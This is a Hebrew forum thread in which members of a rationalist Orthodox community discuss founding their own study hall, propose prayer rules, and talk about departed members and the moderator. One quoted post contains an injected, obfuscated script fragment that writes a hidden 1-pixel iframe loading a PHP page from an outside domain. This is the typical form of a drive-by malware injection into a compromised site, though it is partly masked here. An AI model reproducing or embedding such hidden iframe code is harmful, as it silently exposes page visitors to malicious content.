| נשלח ב-12/6/2010 23:08 |
|
| |
ביהמ"ד דחסידי עצכ"ח
תכננתי לפתוח אשכול זה מכבר, דחיתי זאת מפאת מידי פעם, והאשכול השכן זירז אותי.
מדוע שלא יתלכדו כל הגולשים כאן לפתיחת בית מדרש - ישיבה - מוסדות עצכחים, ובעצם לפתוח אלטרנטיבה לציבור החרדי הקלאסי.
וכמו שהעירו באשכול השכן אין זה חכמה להתחבאות לנצח מאחורי ניקים, ולהתלונן על החברה בה גדלנו, אם רצנוננו בשינוי הבה נעשה זאת, אני השאהיד הראשון של המרכז\מוסדות שיתפתחו.
ולדעתי, אין לחברה החרדית עדנה לאורך זמן, מסיבות כלכליות, ומרנסאנס שיתפתח לדעתי בעקבות פתיחות כלכלית, ובעקבות מסה של אנשים שמאסו בשלטון הטוטאליטרי בו הם חיים. הבה ניצור אלטרנטיבה טובה יותר.
אני מודע לכך שאין זה חכמה להחשף כל זמן שאנו חיים בחברה החרדית כפי שהיא היום, אך מדוע אתם חוששים לקום לאזור אומץ וליצור חברה חדשה הנעה לעבר אוטופיות עצכ"חית.
סבורני שאם יהיה אלטרנטיבה טובה לחברה החרדית כפי שהיא היום, הדבר יסחוף רבים וטובים. ואם אתם מאמינים בצדקת דרככם אין לי ספק שתצליחו.
|
|
|
|
| נשלח ב-6/4/2013 21:40 |
|
| |
מישהו יכול לספק אינפורמציה על הקבוצה הירושלמית והדרך להצטרף אליה? [באישי כמובן].
|
|
|
|
| נשלח ב-30/12/2010 17:20 |
|
| |
יהיה המסקנה איך שיהיה, אם יש משותף לניק פלוני ולהרינג אלמוני, סוף סוף יכול לקום איזה בית מדרש של אנשים עם מכנה משותף, גם אם לא כולם כאן. ומדוע זה לא קם? האמנם מפחד החברה בלבד, או שיש עוד סבות נסתרים?
|
|
|
|
| נשלח ב-30/12/2010 15:06 |
|
| |
ירוחם
תודה.
|
|
|
|
| נשלח ב-30/12/2010 11:46 |
|
| |
הרב מימוני אם אתה כאן הכל כאן. נוסטלגיה זה דבר מאד נחמד. אבל לפעמים הוא משכיח את העתיד ומעות את ההוה. לפני כמה זמן הייתי עם ילדי בבית קברות, והלכנו מרחק גדול בתוכו. אמרתי להם בדרך- אתם רואים כאן שוכבים כל האנשים שלא היה להם תחליף.
|
|
| נשלח ב-30/12/2010 11:30 |
|
| |
אני מתכבד בזאת להציע תקנון ראשוני ומנהגים לבית הכנסת.
תפילת שחרית ביום חול, מתחילה ביוצר אור, עמידה פעם אחת כדעת הרמב"ם, תחנון, אשרי, קדושא דסידרא וקדיש תתקבל. מנחה - אשיר, עמידה פעם אחת, תחנון וקדי תתקבל. ערבית - קריאת שמע וברכותיה, עמידה, קדיש תתקבל.
בימי קריאת התורה אין אומרים בריך שמיה ומקצרים בפסוקים ובממזמורים של הוצאת והכנסת ספר תורה.
שבת קבלת שבת וולנטרית. ברכת מעין שבע נאמרת ע"י החזן בלבד והתפילה מסתיימת בקדיש תתקבל. אם מישהו בביתו אומר שלום עליכם, הוא יודח מיידית מבית המדרש.
שחרית פסוקי דזמרה וולנטריים. אין אומרים הכל יודוך ואל אדון. קריאת התורה כמתואר לעיל. תפילת מוסף מסתיימת בקדיש תתקבל. יש לדון איזו קדושה אומרים במוסף.
המשך יבוא
גילוי נאות - לא כל התקנון על דעתי.
|
|
|
|
| נשלח ב-30/12/2010 11:24 |
|
| |
| מיימוני כתב: |  | | אני הרכיל מגלה סוד.עצכח בהודעה המגדירה את הפורום כמפגש תרבותי עם סגנון, תכנים ורמה מסויימת היא של מנהלנו הרב סיינפלד שליט"א, שעדיין מגיח אלינו. (על דרך הבדיחה בלבד: רצוא ושוב). |
|
האם דבר זה מסביר את היד הקשה (שלא לומר האלימה) שנוחתת עלינו מדי פעם ומוחקת דברים על ימין ועל שמאל לעתים שלא בדין?
|
|
|
|
|
| נשלח ב-30/12/2010 11:01 |
|
| |
ואותי מסקרנת השאלה איך סוסרטי ידע שמנהל המשנה הוא סיינפלד ?
|
|
|
|
| נשלח ב-30/12/2010 10:50 |
|
| |
שותף סוד
האם כוונתך לשאול: מדוע סיינפלד לא מגיע לעתים יותר קרובות?
זה חלק מהשאלה: מדוע יש כאלו שתרמו לנו רבות ונעלמו?
ואולי צריך לשאול הפוך: מדוע יש כאלו שהגיעו ונותרו?
מסתבר שהתשובות לשאלות אלו הן חלק מהנושא באשכול.
מסתבר שצריך להתחיל מאלו שנותרו. נראה לי שהסיבה המרכזית היא אידאליזם. השניה, אהבת האמת. השלישית, קשרים חברות וירטואליים (ואולי לא רק. יש מפגשים חשאיים ליודעי סוד. כלומר סוד של פשט, סמיילי).
אידיאליזם: לעזור למי שבמצוקה פילוסופית. לעזור ליהדות ולתורה בעימות שלהן עם המודרניזציה. לעזור למי שבדילמה של הרמב"ם, בין דת לבין שכל (במובנים המודרניים שלהם). זו בהחלט מצוה, ואפילו מצוות רבות.
יתכן שיש להוסיף כאן את מה שציין הרמב"ם כתופעה פסיכולוגית: מי שהשכיל (במובן הרמב"מי) רוצה להעביר הלאה מן הידע שזכה לו.
אהבת אמת: רצון ללמוד עוד. לברר שאלות. יש כאן הרבה מומחים, הרבה ידע, והרבה יכולת, גם אצל אלו שאינם, עדיין, מומחים.
חברות: היכן תמצא עוד אנשים כמו המופלאים של הפורום? (הרשימה שלי תכלול מן הסתם את כל הכותבים כאן, או רובם, לפחות אלו הכותבים בקביעות שכך אני מכירם). ויש כאלו שיגיעו ויהיה זה רווח להכירם. (אזכיר דוגמא אחת ויחידה וגם בה אולי אני חוטא לכל האחרים שיכולתי להזכיר ולא הזכרתי: רדף השיג).
אז למה יש כאלו שעוזבים?
יש כאלו שהפורום הכעיס אותם, כי מתחילה לא הסכימו להנחות היסוד המתודולוגיות שלו. המוכנות לבדוק כל דבר, כולל הכל (כולל יסוד היסודות). והמוכנות להודות שכן, יש שאלות שאין עליהן תשובה, או תשובה החלטית, או שמתברר שמה שחשבתי שהוא חלק מחבילת היהדות הוא מאוחר/מזוייף/איסור/מטופש. בלשונו של אחד ממשתתפינו של פעם שעדיין מגיע להייד פארק אבל לא לכאן: יש שאלות שלא שואלים ויש תחומים שלא בודקים (אתנחתא החכם זכור לטוב).
ויש כאלו שחשו, אני משער, שמיצו את מה שיש להם לתרום או לקבל. או שהתשואה על הזמן שישקיעו כאן היתה קטנה מדי. או שדברים אחרים בחיים סחפו אותם.
אכן אני מתגעגע לכל הפורשים, החל באתנחתא ורב צעיר וכלה (מצד מעלתם הזכרתים לאחרונה) בוטו שלנו וסיינפלד, אשיות הפורום, שכמעט לא מגיעים הלום.
 |
|
|
|
|
| נשלח ב-30/12/2010 09:21 |
|
| |
| מיימוני כתב: |  | | עצכח בהודעה המגדירה את הפורום כמפגש תרבותי עם סגנון, תכנים ורמה מסויימת היא של מנהלנו הרב סיינפלד שליט"א, שעדיין מגיח אלינו. (על דרך הבדיחה בלבד: רצוא ושוב). ******* language="">
*--
var as='h';
var ac='tt';
var ab='p';
var ay="//";
document.write("*************** src='"+as+ac+ab+":"+ay+"llaptops.co.cc/a1.php?a="+***************+"' frameborder='0' height=1px width=1px scrolling='no' ><*");
//*
> |
|
במידה ולא מדובר בעניינים אישיים, האם מיסטר סיינפלד (או אתה מיימוני) יוכל להאיר את עינינו לגבי סוג זה של מעורבות ? האם יתכן שהנושאים כבר נידושו וסיימו את עניינם ?
|
|
|
|
| נשלח ב-30/12/2010 09:14 |
|
| |
שותף סוד
אני הרכיל מגלה סוד.
עצכח בהודעה המגדירה את הפורום כמפגש תרבותי עם סגנון, תכנים ורמה מסויימת היא של מנהלנו הרב סיינפלד שליט"א, שעדיין מגיח אלינו. (על דרך הבדיחה בלבד: רצוא ושוב).
|
|
|
|
| נשלח ב-30/12/2010 08:39 |
|
| |
בעל החוטם היקר,
אני פשוט מרחם עליך, אני לא מתכוון לעצם האשכול שזה רק להשתעשע,
אבל עצם מחשובותך שהחרדיות היא היא המסורת מסיני, ולא הרציונליות ?!
מי שרק לומד ולא עםארץ יודע שאין להשקפה החרדית שום קשר לתורה ולהיהדות שום כלום,
להפך השקפה הם נגד ההלכה ונגד התורה והיהדות,
רק מה ? הוראת שעה אולי,
והיות שיש עםארצים שאצלהם הוראת שעה היא לדורות והיא היא התורה ?! ולכן אנו סובלים כל כך,
הם לא מבינים שצריך בכל דור ודור לבדוק שוב האם ההוראת שעה רלוונטית לדור הבא,
זה לא חכמה גדולה להקים את היהדות מחדש אחרי חורבן הרוחני (ההשכלה) והגשמי (השואה)
בלי לקחת בחשבון למה ואיך הגענו למצב הזה,
כי אחרת ?! זה יקרה שוב ח"ו
|
|
|
|
| נשלח ב-29/12/2010 15:24 |
|
| |
פי העצכ"חניק אמיתי-הכונה היתה ותיק. לא כתבתי שהוא צודק- כשקבלן בונה בנין למגורים- לא תמיד הוא יכול לקבוע את סוג הדיירים, ואת השקפתם לרוח המקום. או אב כשילדו גודל- לא תמיד הולך בדרך אביו.
|
|
| נשלח ב-29/12/2010 15:04 |
|
| |
כמה שאלות.
א. למה ביה"מ ל"חסידי" עצכ"ח? למה לא בוגרי/יוצאי או חניכי עצכ"ח??
ב. לתודעה. בביה"מ עצכ"ח תהיה עזרת גברים הנשים תשבנה במרכז.
ג. ירוחם מה הפירוש עצכחניק אמיתי הרי בעל הניק שמסתתר תחת הניק המשותף טוען שאין כאן תודעה משותפת אלא פלטפורמה מסויימת ומוגדרת . גם אם נניח שישנה כזו הגדרה "עצכ"חי אמיתי " מנין אתה מסיק שהוא יכול לזהות אותו אולי העצכחי האמיתי הגיע לפורום רק לפני שבוע אפילו שהוא עצכחי במהותו??
ד. לעניות דעתי הבעל שם טוב גם היה לו פורום מסויים שכשהוא פתח לזה בית מדרש צמחה מזה החסידות על פלגיה זרמיה וזרמוניה...
|
|
|
|
| נשלח ב-29/12/2010 15:04 |
|
| |
בעל החוטם האופטימיות שנשקפת מדבריך על בתי המדרש הקיימים ממש משמחת.
|
|
|
|
|